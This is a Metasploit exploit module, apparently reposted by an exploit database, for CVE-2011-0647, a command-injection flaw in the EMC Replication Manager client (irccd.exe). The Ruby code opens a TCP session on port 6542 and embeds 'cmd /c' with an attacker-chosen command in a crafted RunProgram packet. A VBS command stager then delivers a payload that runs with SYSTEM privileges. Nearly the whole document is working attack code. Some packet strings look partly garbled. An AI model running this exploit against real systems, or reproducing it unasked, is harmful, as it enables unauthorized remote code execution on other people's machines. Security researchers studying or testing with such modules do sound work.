## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::CmdStagerVBS def initialize(info = {}) super(update_info(info, 'Name' => 'EMC Replication Manager Command Execution', 'Description' => %q{ This module exploits a remote command-injection vulnerability in EMC Replication Manager client (irccd.exe). By sending a specially crafted message invoking RunProgram function an attacker may be able to execute arbitrary code commands with SYSTEM privileges. Affected products are EMC Replication Manager < 5.3. This module has been successfully tested against EMC Replication Manager 5.2.1 on XP/W2003. EMC Networker Module for Microsoft Applications 2.1 and 2.2 may be vulnerable too although this module have not been tested against these products. }, 'Author' => [ 'Unknown', #Initial discovery 'Davy Douhine' #MSF module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2011-0647' ], [ 'OSVDB', '70853' ], [ 'BID', '46235' ], [ 'URL', 'http://www.securityfocus.com/archive/1/516260' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-061/' ] ], 'DisclosureDate' => 'Feb 07 2011', 'Platform' => 'win', 'Arch' => ARCH_X86, 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'Targets' => [ # Tested on Windows XP and Windows 2003 [ 'EMC Replication Manager 5.2.1 / Windows Native Payload', { } ] ], 'DefaultOptions' => { 'WfsDelay' => 5 }, 'DefaultTarget' => 0, 'Privileged' => true )) register_options( [ Opt::RPORT(6542) ], self.class) end def exploit execute_cmdstager({:linemax => 5000}) end def execute_command(cmd, opts) connect hello = "1HELLOEMC00000000000000000000000" vprint_status("Sending hello...") sock.put(hello) result = sock.get_once || '' if result =~ /RAWHELLO/ vprint_good("Expected hello response") else disconnect fail_with(Failure::Unknown ,"Failed to hello the server") end start_session = "EMC_Len00000001361" vprint_status("Starting session...") sock.put(start_session) result = sock.get_once || '' if result =~ /EMC/ vprint_good("A session has been created. Good.") else disconnect fail_with(Failure::Unknown, "Failed to create the session") end run_prog = " " run_prog << "cmd /c #{cmd}" run_prog << " CM1109A1" run_prog << "00" run_prog << "01" run_prog << "2" run_prog << "1" run_prog << "00" run_prog << "00&" run_prog << ";lt;/aa_anywriter_sthread_eseutil>01300" run_prog << "1000" run_prog << "1335208339" run_prog << " " run_prog << "anywriterbackup " run_prog_header = "EMC_Len000000" run_prog_packet = run_prog_header + run_prog.length.to_s + run_prog vprint_status("Executing command....") sock.put(run_prog_packet) sock.get_once(-1, 1) end_string = Rex::Text.rand_text_alpha(rand(10)+32) sock.put(end_string) sock.get_once(-1, 1) disconnect end end # Iranian Exploit DataBase = http://IeDb.Ir [2013-10-23]